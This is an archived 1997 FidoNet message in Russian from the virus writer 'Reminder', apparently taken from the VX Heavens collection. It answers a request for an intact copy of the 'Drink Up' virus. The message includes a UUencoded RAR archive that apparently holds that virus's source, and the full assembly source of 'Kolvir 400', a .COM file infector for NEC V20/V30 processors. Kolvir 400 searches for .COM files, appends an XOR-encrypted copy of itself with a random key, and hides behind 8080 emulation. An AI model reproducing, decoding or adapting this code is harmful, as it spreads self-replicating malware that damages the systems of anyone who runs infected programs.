Msg : Prev 2602 / 4681 Next -2598
From: Reminder
1997-06-21 11:58:46

To  : Igor Dikshew

Subj:

Hадоть...


Привет Igor! 

Смотрю я значит на дисплей, а там - 19 Jun 97 10:59, 
Igor Dikshew пишет к Reminder, во- думаю, дай чего-нить скажу: 

ID> Попался ко мне кусок вируса с текстом 

ID> *.com [Drink Up] by Reminder 
ID> Greetings: SGWW, DVC, FotD, SOS group, TAVC, CiD 

ID> Кусок вируса явно битый. Если у тебя есть нормальный вариант, кинь 
ID> pls. 


=== Cut === 
s­ection 1 of 1 of file drink_up.rar -={ UUE 1.08, ARA (C) 1995 }=- 

filetime 584408865 
b­egin 644 drink_up.rar 
M4F%R(1H'`#O0<[email protected]`#0````````":LG0`@"P`T`<``"L0````2I=-I)UAG"(4 
M,PP`(````$1224Y+7U50+D%330P=E1#,S,``'5>Y,!^#\H#`259*FDE-I(IM 
MRH-2RT"06BN1L",,$:3NE:[email protected]#Z7>FB]5$+*):+/]?DI*(83 
[email protected]*2).YF[><S-TK5'([.B=A`069G/YGW.<^SF9OAO[]]GW1SF9T9X#*H 
M3IR\^D']>KU,;X=E=6DP'?F,S)@=UE?R>(/YY%H4[3>=W^&Q_+O!L:6SI&!. 
M5VH0?Q::IKA&RC8ITJ<Z>$36UNR$,/!,,Y=DLNH3SQN=C`Q79.O/VP^FB"4' 
M_=^]OA6LW\.`//PVPNU?59P5;H7+M[TML&"]@;_CNV;(6K]7TW;#9X_?OV-Z 
ML.OS&-]63L7,)Q36;(U;[email protected]="[email protected]%K8?=[;%AR[_AQSJ6+O&>4P 
M>+V&16-C=;'#7LG[MY,WQ!V"W8KBNV3R5S(XG4M^K:#\!9L=E?`/_0TF!SE4 
MZW$D9FMO#NURJ>D_-^\?"_:JG'KD-!QW4"0[5<82LPC0X7-:X>NK?.MODD/, 
MWQI\%H41MF.Y(,-])JA'*2QGFN"NNM(=!1J]M06KV[7JDTNW><8J<U-=.S61 
M$&OHXP85_O9,(<MW"!ZQA89LF=Z[[email protected]+NN#+#I[U=P^L2\Y/?+:A?E5LW4SNW 
M#T1Q<6CB/N*+"7+=WA$#N6-TX[6<VL>TY14^.B-$CS'=RJSO-C8M86X&8AIY 
M2WQFV=(/\.!7A!8SF.NYI<"[email protected]&U^S&%L(?>957T%[email protected]*5V4;U4B$_ZJG`-/ 
M5[/.>5,%?[/3QE7X^^[>N^XYB%;2*&!&+O?,7O0,?%30BA#"/QB_0\[email protected]`QN[ 
[email protected];NL4\Q'[email protected]!W:PCBXFJQR3.*&N,TL`D>PNCNC8!'Z(S;JU;]W`[=8M\5U!) 
MIZ\K/J^L^WW%D$&I,(X0)`CD.\#0X76X38,W2)1K</K&:KGY,%DI8"0?>W;? 
M&YK6),PO4AFE<]0(,;P"W'$<2/7:Q(N*_<JCNY3S.)A(LJ1B1E!BT=\\_",3 
MF97=+TD2D*EOF14##Z=\JSW[WL$$>:P65)^>5L^P80`>%'-/\O!`M*M>M7\. 
MZ1'N(X_!A/-P.HMI8<<MB6-]_C8EU^W^[email protected]"E,G[@Y)7)DJ#.T$1 
M11C*6J2K-*/DS$\82JD*,5C37YQA>5ME0R*I\491L5I(*2XS$*+V<>HJWN<8 
M3*]$%VHX33H-22>)-V.RGZY_VA+I\P3I/G*FTSX`JU.D:JF-TAT.C5%_R#P2 
M*[email protected]:FH([email protected]&6=PF.D$6(QTE;5U<[email protected]=)8/+,R$EG;7G`AX 
MNUCGU\Y[\2P,74:;3`2:A+]1UC:)UM3&][email protected](=J&!2M3KS(1B\L6Q<8FD_UH 
M`/4EE,]#N5Y"D(,V65Z194"".6&1-J3)#5$9HJ(H%T3PG;F.7::S*DE[-(G> 
M/+#K.U3Y#[email protected])+/[D-<<M18_!IH;1">72%48U5EA6WM1;DYXJ83R88DD, 
MS93VNN\IS)[[N6E,COXX"JXG<($R1B%><\)57%[email protected]+2)4ZB:SS">><LG=4*/ 
M8TWU`MW^L4]#;3&9C#`^N$,OP?-\^S`D3)IR^O&@.3/ZV>.,3?($8B'-'24V 
MSB^?/R?-BT6*G4CH*V)[email protected]"4A"$2'SHP$F34?I#G\FJU#;>(&Q-615"A+ 
M&<\LQJ2ZTBBS0VF52F411I"2-P_R_P1`_%H-*^-<%G,P)`6^R<H[@[email protected]% 
ML>)R([B9BKC8)$HWDH,](HJ8^%NSGR$)P+/D/?(<30'P!1%Q>"[email protected]!" 
M1=FF[IKE-Z*/]+G*M"1B6W!$6/9*#[*<Q'[email protected]\E!F2&@Q,.=N4E 
M]',=[F95%M5/D^0K67<#^W9&*U$#@YD]>IB4*$8N;':;[[email protected]&64BE7+ 
M678Z:>05ALFQB:-A49VKA'!%B_.5VU4X9-2$L-CF"[I91$(S?*'`>&8]L&A2 
M($DZR-\^V".,_ZL_W]-!VT4:B$\B1=!O(R)O*8WHGA+S:*#FE.\F?\PSKL?D 
M*=R+/43H>^G%3*+\4P-<I)0TL"96%HZ"U311*]B;H21Q$6WX?!!,T^DUO-D$ 
MG2GYTU^@2IBN%!3>\W)[&X+>1>4<N=?K__/V9W15<TU^BXX72Q3GK*[A1GFN 
M!%2LMABP!4]9E?L<I3Q_T0`>Y&#\*]*@RFPFGCUTRPQ,[email protected]!8->L'Q?TE 
MA`3N>_83B_!M?0`6?)173'PNOD$3VD/HI4;64Q9BL)Y_T5V9J;I-&A1D=%MA 
MZG+F2R+5"2;(Y/D2N'W![O>VA4!\I;9M8H^7/KO.%,I1(8+9)E:$H2Z=M\^[ 
[email protected]]WJ12X"H\-:._QJ8GP)9.$U1>Q484G$B*1\+P^2='@@)`VL%3)IY87_1X 
MJ\WC+1`RI61TJ.5'(:Y:<TBI;<S*:`[email protected]=II((EOI\FK/6+S.ZDO&,%(QR 
MQ=5D)R5YX;$KHP'80'ICWBW1>$;22&?^T?1Y.SR.<1DT:7A?^F[Q#=Y#^B\X 
M;'2[(J:Q>B<1PCZDR6?E.<<]O7'(X=[Y?!X(0;/?[N0_?0I;.1[P_7IM,T*= 
M'*OHV"UN[,V<SCA([Z'_'T"_V4PZT-/!0NCLLZ?*1F^P)""(\AQB[$/3(Z1= 
M$26U'[email protected]+PQ2&=`SF0L"%/]=]Q2/NH']H2M&#*\/",C/%U>IU>H`;C%T$(`L 
M`-`$``#,)0```!%IYC"=89PB%#,,`"````!!4TU?.#`X,"Y)3D/_P8*J&9FB 
M```"HN^P,^'?P%Z&O:67JSU\3>B!(E,.X&XV&Y!D_\E<;&#()F(I^+-)%,7C 
M^!=RXJ)HUWJZ:-,DSXN":.\KG:0%$!Z_I]>SL#WT[S8'\O,&K66SYOPK/?ET 
M\KDL_`+-VSE]!O3>6FM^JX<TS>[email protected]:*>^QW2;+M#CIX.MMY4L;SKC>:7R9GF 
M<B'=[2I+I10)DETN1^'J;[#RB/G^_6UW5B3SEH?P&Z2^"I\@&X`E?D)>AS`U 
ML0."S^*9V+O?'+4#@TQ'G=19P0YN4Z="3^(C").'*<[C0JZ6[E(7:]$$4:RF 
MP-9,)B!E,AF,M1?#9I7J?=-&G`B-6#U:<*)5-A*:BM`((K<[email protected]:%'W=/#PC 
[email protected]^MOC3_Z^-2-]+\[email protected]&UUOND2L'#D#*M-G) 
M)4[A/K"C$IJ+5C&1HS6$\)$Z;]N-)4G8DX0#6DX_6]_4$DQ)*UOM1!%KQ&O( 
M:;_-^>/()<2890<$9\?I;NQ)+?]QR"4U%7C&9L$\)4X.V$RQ=#8JCQY-WX1E 
MB*/SS98RC\[&60H_G#EE*/YIY9BCZ;[email protected]%C^DH&HH&LH&PH%[email protected] 
M;[email protected]>X2C,G1=2!,)JC1FBQMR9HRA,TA0F:4H3-,4)FG*$S8DHVK']/&@:[email protected]:R 
[email protected];"@6%`M*!M*![A*,Z=-*C1G%I!/%C;DSQE"9Y"A,\I0F>8H3/.4)GQ)1U+' 
M]/&@:[email protected]:[email protected];"@6%`M*!M*![A*-"=-:C1H%K!1%C;DT1E":)"A-$I0FA24=.K 
MS?9SX[V^9M&))M:QW3C;AJ*!K*!L*!84"TH^DVA%6L?GA2G!W(ROF?2I);FK 
MYFTQ"?,NF,3YDTR"?,>F43YBTS"?,.F<[email protected]&%TF--(E"^H0:Q!L$%@@M$& 
MT0>X1C4G#?Z+K<[email protected]:OF#5$(FJ,[email protected]:I1$U3")JG$34I&.^S`+Z>*#4(-8 
[email protected]""P06B#:(/<(Q_3_S)C\ESL\]:Y,GDN=E_G1(FH8T5J&1%I0RHM2&9%K0S 
MHJT*D<^N["-Z>",5",5B,6",,$8:(Q:(QW"0?U3ALPF38#[email protected]!9(( 
M%[email protected]"!9.(%[email protected]%0C%8C%@C#!&&B,6B,=PD']DX;KN;]>PYBD 
M?NYJI1S,X#QZ7O,]MQON/GN07!7=&[email protected][*:NZD"N+,%(Y]N;N>XFIF 
M3PDV_S\,ZG6I/VY99J3V[EG'VBD\^,()5Y)`PK:Q-J]6J#;VIK[[email protected]:F\[email protected] 
MOW"E_W3DOD-Q*[email protected],,@$0TUV>GF-LB79#??:4JN*L%,!`]"-X_$:G6%[email protected]\8 
M4:Y*>/MY0(4LR"0A/G)5)[email protected]_L)TD4$SP_A..W8_AUHE3][0]+VHB+>&OKY 
MZ5:$MJM5MD-V=I,JX;P4UT`];>/Q*IUAVJU&[5)FVLP!5<OWI>N&,E0KNHB/ 
MNQ>L,:9*>/7=!((^)E8T>'\IR?PW1B3OMW_TJP8$\P"(T9*>.FH-SLV!.T%T 
M]I.N&&<%/)`/31V$[SJ=854FNA?V;-JT[:/;7!"N2G6U9/X*?J"Z<K60VP1[ 
MV$Y4*QD&;RV>6;TWVM_/-_O/SBSW?*;^XZ1W?F3VD]L[+/[&U7?\;=UHRWA_ 
M:':_][C[75R_D+5^=!"`+`!:````=P$````IK&/ZG6&<(A0S#``@````3D5# 
M7S(P7U4N24Y#^GU3\%_\&=R(:]CS#KH9N_SGXG"?-?:G7-W8KE9?NH(OM'3L 
M9UU]IYHRS*SK\Q[!.GEVJWE=/"OU^[email protected][Y=V*C\N?6"[O+UJ4/OY&)9J#E!U 
)^V<O>NNV>WR` 
` 
end 
sum -r/size 6611/4817 section (from "begin" to "end") 
sum -r/size 41082/3474 entire input file 
=== Cut === 

и из той же серии: 


=== Cut === 
; (c) Reminder (1997) 
; [Nec20 virii collection] 
; Date 6-Marth-1997 
; Time 8:14:19 

.model tiny 
.code 
org 100h 
start: 

include asm_8080.inc 

brkem macro inter 
db 0fh,0ffh,inter 
endm brkem 

retem macro 
db 0edh,0fdh 
endm retem 

int86 macro oper8 
db 0edh,0edh 
db oper8 
endm 

int21h macro _ax,_cx,_dx 

ifnb <_ax> 
_lxi_sp _ax 
endif 
ifnb <_cx> 
_lxi_b _cx 
endif 
ifnb <_dx> 
_lxi_d _dx 
endif 
int86 78h 
endm 

;========================================= 

mov cx,3 

; check nec20/30 
db 0f3h,26h,0ach ; rep es: lodsb 
or cx,cx 
jnz fuck 

xor ax,ax 
mov es,ax 
mov di,77h*4 
lea ax,entry 
stosw 
mov ax,ds 
stosw 
lea ax,entry21 
stosw 
mov ax,ds 
stosw 
push ds 
pop es 

cli 
brkem 77h 
sti 
jmp beg 

entry: 
_lxi_b beg 
_lxi_d len2 

decod: 
_ldax_b 
_xri 0 
kod equ $-1 
_stax_b 
_inx_b 

_dcx_d 
_mov_a_d 
_ora_e 
_jnz decod 
_jmp beg7 

beg: 


; int 3 
push bx 

xchg dx,si ; si <- de 
xchg di,bx ; di <- hl 
cld 

mov ax,0f0h 
push ax 
fuck: 
ret 

beg7: 

_lxi_sp 0f000h 
_lhld len_of_infected_program 
_shld old 

;------------------------------- 
; b -> d 
_lxi_b 80h 
_lxi_d buf1 
_mvi_h 100 
@work: 
_ldax_b 
_stax_d 
_inx_b 
_inx_d 
_dcr_h 
_jnz @work 
;-------------------------------- 
int21h 4e00h,20h,fmask 
find: 
_jc quit 

_lxi_h 9ah+1 ; len (hi byte) 
_mov_a_m 
_cpi 0EEh ; > ~61000 
_jnc next 
_cpi 3 ; < ~700 
_jc next 

int21h 3d02h,,9eh 
_jc next 
_xchg ; hl <-> de : xchg aka xchg bx,dx 

int21h 3f00h,len,buf 
_jc next 

_lxi_b buf 
_ldax_b 
_cpi 0b9h 
_jz next 
_cpi 'Z' 
_jz next 
_cpi 'M' 
_jnz @1 

next: 
int21h 3e00h,, 
int21h 4f00h,, 
_jmp find 

len_of_infected_program dw len 

@1: 
int21h 4202h,0,0 
_jc next 

; de - len 
_xchg ; de(dx) <-> hl(bx) 
_shld len_of_infected_program 
_xchg ; de(dx) <-> hl(bx) 

int21h 4000h,len,buf 
_jc next 

_shld _h 

;------------ !!! 
_in 40h 
_sta kod 
_sta kod2 

_lxi_b 100h 
_lxi_d buf 
_lxi_h beg-100h 
@2: 
_ldax_b 
_stax_d 
_inx_b 
_inx_d 

_dcx_h 
_mov_a_h 
_ora_l 
_jnz @2 

;----- 
_lxi_b beg 
_lxi_d buf+beg-100h 
_lxi_h len2 
_jmp @3 

@3: 
_ldax_b 
_xri 0 
kod2 equ $-1 
_stax_d 
_inx_b 
_inx_d 
_dcx_h 
_mov_a_h 
_ora_l 
_jnz @3 

_lxi_h 0 
_h equ $-2 

int21h 4200h,0,0 
_jc next 
int21h 4000h,len,buf 
_jc next 

quit: 
;----restore dta ----- 

_lxi_b buf1 
_lxi_d 80h 
_mvi_h 100 

@work2: 
_ldax_b 
_stax_d 
_inx_b 
_inx_d 
_dcr_h 
_jnz @work2 
;------------------------ 
_lxi_h 0a4f3h 
_shld 0f0h 
_lxi_h 0c390h 
_shld 0f2h 

perl: 
_lxi_h 0 
old equ $-2 
_lxi_d 100h 
_dad_d 
_xchg ; hl(bx)->di = 100h ; de(dx)->si = infected+100h 
_lxi_b len ; bc(cx) = len 
retem 

entry21: 
mov ax,bp 
int 21h 
xchg ax,dx 
pop ax ds 
pop cx ; skip old flags 
pushf 
pop cx 
and cx,7fffh ; clear md flag 
push cx 
push ds ax 
iret 

fmask db '*.com',0 
buf equ 0f000h 
buf1 equ 0fffeh-400 
mess2 db '[Kolvir 400] by Reminder' 
len equ $-start 
len2 equ $-beg 
len3 equ beg-start 
ret 
end start 
=== Cut === 

С бестовыми регардами , Kostya Volkov aka Reminder 

.' [Death Virii Crew] [Crematorium fans Team] [WW] `. 

--- 
* Origin: chaos a.d. (2:4631/17) 
VX Heavens - коллекция вирусов,исходников и статей.
Страницы можно листать стрелками
Пользовательского поиска